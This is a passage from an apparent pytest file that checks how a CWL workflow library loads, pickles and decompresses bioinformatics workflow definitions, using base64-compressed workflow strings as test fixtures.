# "chrom_length_file": {
# "class": "File",
# "location": "../inputs/dummy.txt"
# },
# "scale": 1
# },
# ["workflows", "bam-bedgraph-bigwig.cwl"],
# os.path.join(DATA_FOLDER, "jobs")
# ),
# (
# {
# "bam_file": {
# "class": "File",
# "location": "../inputs/dummy.txt"
# },
# "chrom_length_file": {
# "class": "File",
# "location": "../inputs/dummy.txt"
# },
# "scale": 1
# },
# # bam-bedgraph-bigwig.cwl
# "eNqtV21z1DYQ/iuaGzqBac5OwsvAFWhDgJKWtyFQPpBOTrb3bE1kyZXkOwLDf++uZPtsxy\
# HttGGY8UmrfVbPvmj36yzdyD/AWKHVbMFm6/1ob7bLZqnk1tLCR23OV1JvaNHAX7UwUIJy\
# tPfp61bsxEF1rKraPftcGbCk7t1WevZtl/WEj5UUCn7ja25TIyo3kPwTgQRpItGvs4SXZy\
# shwf9wFxV9zJ7TAsplOg36UJw9OXzFSHKXWW0cZCy5YKnWJhOKO7BkwywtjC7PJKjcFdeq\
# fc8TloEUpSBt/qi2ugQWznuwBXvoN17zEh4/fH/45HH4fSK+wGMPaVM+gkE6ufu5B3SkYb\
# USqcD7M6eZP8FcASwHRXipXoPhOdCNOP5S1nEUXfHUaeNBSl5VkJ0Z4Jk9U3WZgBlACjUA\
# fMsN2uvAEByipbVEihpgbtn+nv+LJ9RG7DhX2gR6E8ic1tLOg6FoZ4ThxIQ6VeQ3p89QIj\
# e8KpjFAGFi1WAIyyqj1yKD7FT5G1RcmLQQ1cDsBJUDV33TnymeoAISh2wOKrtEUnsfimjS\
# vMJVCq0ziz75HisngJyKz3i19gijI2ylzbUg1hmusoF2XBIqH/i5Y3qsTq+QNPTHmkuL6L\
# pEP9sKUoFhwRrdBJOIfCNyH7kKPXgN3pvaUWK00u1FENKnh8g/ijyobbz0PymG7FfSFoip\
# pHDXOfVqYkgz8LRAhxtHNFFaeJ1Nhu+83mHIDtt5usMoTj1ohvZdi1lwhQCBXMaD5pJsID\
# VURFiiMct98KNBdE1yjDeALt26hQC1J6SpWFsfTVaXIHuia5MGen216jLFZ41XEfc1XSI/\
# uM/74LIP/zFwBxs3ZrRgkicgPXWNN5neOn3CmlYq2BNSAqptDe/VAr9mav/eRFHsK0g8XU\
# pm/jHwB/yb0F5u+yyQJVC5oDSDFa8lhdtsnuSj+LPbi/s13MR0q+E5epVWb3w9VYxK1E0L\
# csUePWKqlvKWX2UYBq42ijlTw0+08o2BtMCGu3Qw7J6qb01hC7T1M2si3YYFcPs9Ub5GC7\
# 0Xpvm48jmYXO7XrvbLZxD99nnUXIIe/FlwzlmbnsEFf3qe+8E06WF88+vPc5IbebZW/dhr\
# nNuLl3gSFc+fw8XI7Z9m+7v7tHWwe6DQsL7tfZDO5MnEmzS/Tm06b2WdDpKjm4xz8PspNt\
# WMTCxeEUOjl6B/037dCBzcIBlb8RRCRvo2rHCuWsSxTQsoeaRNHnstN8KC7/C8jB0KrUO3\
# GFO9tq7dMdlqRq2bXXQW8rLja94Q6wUyvVHYAmUfjGzNIAjDN1EuXFEntQWDXY7DII+w8M\
# ZPuLHnYo4lKd407ajF3gQLjGmrx2Ws1jV2keoM3kGlrcB26aIPGeCuxAjHpUhBWegxttls\
# Io5kFuAJaQRs/PL46Nnrk2fzg9BD24Ww2Gm5NyvPedf+2sURpqATa6DmejYg7UiXpVas7b\
# rZS3ykaoz5IFVvGUMzUi+7kVvX4V1Jszaj7twu3picK/ElNCzhWpBz+bqFFSoVCvtkwY4K\
# ITMDaseyF9pWwnHJXkEmsLawI6AmpTmv06BtDPVWY3sqD7OM5oAgy8OPI10rFzzw4eRwsP\
# UStWFRvhgaMxB5B3kzpLx5ETYqj3SE7qXVO3cPDh6EDaxjAK41Afdu4x97giUaW7zDdcOm\
# AwlVoZU//eP+zbv7t2/du31vfudgby/MIXTLXPcjhlyfdvalDVfWu2Ael8gTj7f7PxzsdS\
# JxLnXCJS7ZgmPvGnc7cwKZK9hElWpTBKjf8QPRv/TkoZRg8gvfEx2XZa00ar/4r1pDdrB3\
# YIHjy4RhmQSpEprHZRQDWCNaRW1ov0K6OEj2u3ZS8CaKsHQIGd4mIZ1elALZic6DyC85rV\
# J6Nm5FTYfN5CmyXiZok4rM+4DGljn+P5jfu3P/3vz2/Qf30ZXtv23b0iUY1hksaM4yMRgi\
# qR3XbY9FXA4aHBud4ogzHDuZLXQtSXB6/mQ3m/HZbyxHb9zSD0i3gt4VW/oWZdkYhdOS0q\
# 6bmBjWR9+IkKLm7YvY0/DB0N04M+ARUVbSz9R4Qii27JqdJdoLaKnucE5VA6QsAlxhHM2K\
# fK1FxjDvrKApLKlzUo2Vlsow22A5xR7IORwXWsOYh7W+kW8La7hWIHHpm5YlK3DsLERe4E\
# xaGaEN1gJG773vt5cTncsyYu9xC2MO5wLlR0rkJRtOtMt5o77qJl40BFHbdpN17eYS+z66\
# 5aXL30L18oLuibM3R+o3BajGM631Iw9FDNOw8wSyO3BFw/Fkw7sMpIxe9yWxKRTSSGw0jb\
# ifvLxpU3Odj8nIwwx7zSt1narpMS5EN+VAyuneK/SnSgl6GtTbRVHRcXX5OmO+6NJE2ShC\
# PGozW7FMqx2HcbJG8tBSHNXaQO4CMyzjYSwZFdayRNCbwsAYbWywZYsQ4uVUYeDZOmnXo9\
# m3vwGItZCP",
# os.path.join(DATA_FOLDER, "jobs")
# ),
# (
# {
# "bam_file": {
# "class": "File",
# "location": get_absolute_path(
# "../inputs/dummy.txt",
# os.path.join(DATA_FOLDER, "jobs")
# )
# },
# "chrom_length_file": {
# "class": "File",
# "location": get_absolute_path(
# "../inputs/dummy.txt",
# os.path.join(DATA_FOLDER, "jobs")
# )
# },
# "scale": 1
# },
# ["workflows", "bam-bedgraph-bigwig.cwl"],
# None
# ),
# (
# {
# "bam_file": {
# "class": "File",
# "location": get_absolute_path(
# "../inputs/dummy.txt",
# os.path.join(DATA_FOLDER, "jobs")
# )
# },
# "chrom_length_file": {
# "class": "File",
# "location": get_absolute_path(
# "../inputs/dummy.txt",
# os.path.join(DATA_FOLDER, "jobs")
# )
# },
# "scale": 1
# },
# ["workflows", "bam-bedgraph-bigwig.cwl"],
# os.path.join(DATA_FOLDER, "jobs")
# ),
# (
# {
# "bam_file": {
# "class": "File",
# "location": "../inputs/dummy.txt"
# },
# "chrom_length_file": {
# "class": "File",
# "location": "../inputs/dummy.txt"
# },
# "scale": 1
# },
# ["workflows", "dummy.cwl"],
# None
# )
# ]
# )
# def test_load_job_from_object_should_fail(job, workflow, cwd):
# with pytest.raises(AssertionError):
# test_load_job_from_object(job, workflow, cwd)
def test_slow_cwl_load_workflow():
workflow_data = slow_cwl_load(
workflow = os.path.join(
DATA_FOLDER, "workflows", "bam-bedgraph-bigwig.cwl"
)
)
assert isinstance(workflow_data, Workflow)
def test_slow_cwl_load_command_line_tool():
command_line_tool_data = slow_cwl_load(
workflow = os.path.join(
DATA_FOLDER, "tools", "linux-sort.cwl"
)
)
assert isinstance(command_line_tool_data, CommandLineTool)
def test_slow_cwl_load_reduced_workflow():
workflow_tool = slow_cwl_load(
workflow=os.path.join(
DATA_FOLDER, "workflows", "bam-bedgraph-bigwig.cwl"
),
only_tool=True
)
assert isinstance(workflow_tool, CommentedMap)
def test_slow_cwl_load_reduced_command_line_tool():
command_line_tool = slow_cwl_load(
workflow=os.path.join(
DATA_FOLDER, "tools", "linux-sort.cwl"
),
only_tool=True
)
assert isinstance(command_line_tool, CommentedMap)
def test_slow_cwl_load_parsed_workflow():
workflow_tool = slow_cwl_load(
workflow=os.path.join(
DATA_FOLDER, "workflows", "bam-bedgraph-bigwig.cwl"
),
only_tool=True
)
workflow_tool = slow_cwl_load(workflow_tool)
assert isinstance(workflow_tool, CommentedMap)
def test_slow_cwl_load_compressed_workflow():
workflow_tool = slow_cwl_load(
workflow=os.path.join(
DATA_FOLDER, "workflows", "bam-bedgraph-bigwig.cwl"
),
only_tool=True
)
workflow_tool = slow_cwl_load(
get_compressed(workflow_tool),
only_tool=True
)
assert isinstance(workflow_tool, CommentedMap)
def test_slow_cwl_load_compressed_raw_workflow():
workflow_tool = slow_cwl_load(
get_compressed(
os.path.join(
DATA_FOLDER, "workflows", "bam-bedgraph-bigwig-single.cwl"
)
),
only_tool=True
)
assert isinstance(workflow_tool, CommentedMap)
def test_slow_cwl_load_workflow_should_fail():
with pytest.raises(SchemaSaladException):
workflow_data = slow_cwl_load(
workflow=os.path.join(
DATA_FOLDER, "workflows", "dummy.cwl"
)
)
def test_slow_cwl_load_compressed_raw_workflow_should_fail():
with pytest.raises(SchemaSaladException):
workflow_tool = slow_cwl_load(
get_compressed(
os.path.join(
DATA_FOLDER, "workflows", "bam-bedgraph-bigwig.cwl"
)
),
only_tool=True
)
@pytest.mark.parametrize(
"workflow",
[
(
["workflows", "bam-bedgraph-bigwig.cwl"]
),
(
["tools", "linux-sort.cwl"]
)
]
)
def test_fast_cwl_load_workflow_from_cwl(workflow):
pickle_folder = tempfile.mkdtemp()
workflow_path = os.path.join(DATA_FOLDER, *workflow)
pickled_workflow_path = get_md5_sum(workflow_path) + ".p"
try:
workflow_tool = fast_cwl_load(
workflow=workflow_path,
cwl_args={"pickle_folder": pickle_folder}
)
pickle_folder_content = os.listdir(pickle_folder)
except BaseException as err:
assert False, f"Failed to run test. \n {err}"
finally:
shutil.rmtree(pickle_folder)
assert isinstance(workflow_tool, CommentedMap), \
"Failed to parse CWL file"
assert pickled_workflow_path in pickle_folder_content, \
"Failed to pickle CWL file"
@pytest.mark.parametrize(
"workflow",
[
(
["workflows", "bam-bedgraph-bigwig.cwl"]
),
(
["tools", "linux-sort.cwl"]
)
]
)
def test_fast_cwl_load_workflow_from_parsed(workflow):
pickle_folder = tempfile.mkdtemp()
workflow_path = os.path.join(DATA_FOLDER, *workflow)
pickled_workflow_path = get_md5_sum(workflow_path) + ".p"
try:
workflow_tool = fast_cwl_load(
workflow=workflow_path,
cwl_args={"pickle_folder": pickle_folder}
)
workflow_tool = fast_cwl_load(
workflow=workflow_tool,
cwl_args={"pickle_folder": pickle_folder}
)
except BaseException as err:
assert False, f"Failed to run test. \n {err}"
finally:
shutil.rmtree(pickle_folder)
assert isinstance(workflow_tool, CommentedMap), \
"Failed to parse CWL file"
@pytest.mark.parametrize(
"workflow",
[
(
["workflows", "bam-bedgraph-bigwig.cwl"]
),
(
["tools", "linux-sort.cwl"]
)
]
)
def test_fast_cwl_load_workflow_from_pickle(workflow):
pickle_folder = tempfile.mkdtemp()
workflow_path = os.path.join(DATA_FOLDER, *workflow)
duplicate_workflow_path = os.path.join(pickle_folder, workflow[-1]) # will fail if parsed directly
shutil.copy(workflow_path, duplicate_workflow_path)
try:
workflow_tool = fast_cwl_load( # should result in creating pickled file
workflow=workflow_path,
cwl_args={"pickle_folder": pickle_folder}
)
workflow_tool = fast_cwl_load( # should load from pickled file
workflow=duplicate_workflow_path,
cwl_args={"pickle_folder": pickle_folder}
)
except BaseException as err:
assert False, f"Failed to run test. \n {err}"
finally:
shutil.rmtree(pickle_folder)
assert isinstance(workflow_tool, CommentedMap), \
"Failed to load pickled CWL file"
@pytest.mark.parametrize(
"workflow",
[
( # bam-bedgraph-bigwig-single.cwl
"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 zhXTfFcVnL/gosFZpps\
/GU8SmShNS4FB6wsEIYqpbGyfu61v/weDmYiG"
)
]
)
def test_fast_cwl_load_workflow_from_compressed_cwl(workflow):
pickle_folder = tempfile.mkdtemp()
pickled_workflow_path = get_md5_sum(workflow) + ".p"
try:
workflow_tool = fast_cwl_load(
workflow=workflow,
cwl_args={"pickle_folder": pickle_folder}
)
pickle_folder_content = os.listdir(pickle_folder)
except BaseException as err:
assert False, f"Failed to run test. \n {err}"
finally:
shutil.rmtree(pickle_folder)
assert isinstance(workflow_tool, CommentedMap), \
"Failed to parse CWL file"
assert pickled_workflow_path in pickle_folder_content, \
"Failed to pickle CWL file"
@pytest.mark.parametrize(
"workflow",
[
(
["workflows", "dummy.cwl"]
)
]
)
def test_fast_cwl_load_workflow_from_cwl_should_fail(workflow):
pickle_folder = tempfile.mkdtemp()
workflow_path = os.path.join(DATA_FOLDER, *workflow)
with pytest.raises(AssertionError):
try:
workflow_tool = fast_cwl_load(
workflow=workflow_path,
cwl_args={"pickle_folder": pickle_folder}
)
except (FileNotFoundError, SchemaSaladException) as err:
assert False, f"Should raise because workflow wasn't found. \n {err}"
finally:
shutil.rmtree(pickle_folder)
@pytest.mark.parametrize(
"workflow",
[
(
"nonenonenone"
),
( # bam-bedgraph-bigwig.cwl
"eNqtV21z1DYQ/iuaGzqBac5OwsvAFWhDgJKWtyFQPpBOTrb3bE1kyZXkOwLDf++uZPtsxy\
HttGGY8UmrfVbPvmj36yzdyD/AWKHVbMFm6/1ob7bLZqnk1tLCR23OV1JvaNHAX7UwUIJy\
tPfp61bsxEF1rKraPftcGbCk7t1WevZtl/WEj5UUCn7ja25TIyo3kPwTgQRpItGvs4SXZy\
shwf9wFxV9zJ7TAsplOg36UJw9OXzFSHKXWW0cZCy5YKnWJhOKO7BkwywtjC7PJKjcFdeq\
fc8TloEUpSBt/qi2ugQWznuwBXvoN17zEh4/fH/45HH4fSK+wGMPaVM+gkE6ufu5B3SkYb\
USqcD7M6eZP8FcASwHRXipXoPhOdCNOP5S1nEUXfHUaeNBSl5VkJ0Z4Jk9U3WZgBlACjUA\
fMsN2uvAEByipbVEihpgbtn+nv+LJ9RG7DhX2gR6E8ic1tLOg6FoZ4ThxIQ6VeQ3p89QIj\
e8KpjFAGFi1WAIyyqj1yKD7FT5G1RcmLQQ1cDsBJUDV33TnymeoAISh2wOKrtEUnsfimjS\
vMJVCq0ziz75HisngJyKz3i19gijI2ylzbUg1hmusoF2XBIqH/i5Y3qsTq+QNPTHmkuL6L\
pEP9sKUoFhwRrdBJOIfCNyH7kKPXgN3pvaUWK00u1FENKnh8g/ijyobbz0PymG7FfSFoip\
pHDXOfVqYkgz8LRAhxtHNFFaeJ1Nhu+83mHIDtt5usMoTj1ohvZdi1lwhQCBXMaD5pJsID\
VURFiiMct98KNBdE1yjDeALt26hQC1J6SpWFsfTVaXIHuia5MGen216jLFZ41XEfc1XSI/\
uM/74LIP/zFwBxs3ZrRgkicgPXWNN5neOn3CmlYq2BNSAqptDe/VAr9mav/eRFHsK0g8XU\
pm/jHwB/yb0F5u+yyQJVC5oDSDFa8lhdtsnuSj+LPbi/s13MR0q+E5epVWb3w9VYxK1E0L\
csUePWKqlvKWX2UYBq42ijlTw0+08o2BtMCGu3Qw7J6qb01hC7T1M2si3YYFcPs9Ub5GC7\
0Xpvm48jmYXO7XrvbLZxD99nnUXIIe/FlwzlmbnsEFf3qe+8E06WF88+vPc5IbebZW/dhr\
nNuLl3gSFc+fw8XI7Z9m+7v7tHWwe6DQsL7tfZDO5MnEmzS/Tm06b2WdDpKjm4xz8PspNt\
WMTCxeEUOjl6B/037dCBzcIBlb8RRCRvo2rHCuWsSxTQsoeaRNHnstN8KC7/C8jB0KrUO3\
GFO9tq7dMdlqRq2bXXQW8rLja94Q6wUyvVHYAmUfjGzNIAjDN1EuXFEntQWDXY7DII+w8M\
ZPuLHnYo4lKd407ajF3gQLjGmrx2Ws1jV2keoM3kGlrcB26aIPGeCuxAjHpUhBWegxttls\
Io5kFuAJaQRs/PL46Nnrk2fzg9BD24Ww2Gm5NyvPedf+2sURpqATa6DmejYg7UiXpVas7b\
rZS3ykaoz5IFVvGUMzUi+7kVvX4V1Jszaj7twu3picK/ElNCzhWpBz+bqFFSoVCvtkwY4K\
ITMDaseyF9pWwnHJXkEmsLawI6AmpTmv06BtDPVWY3sqD7OM5oAgy8OPI10rFzzw4eRwsP\
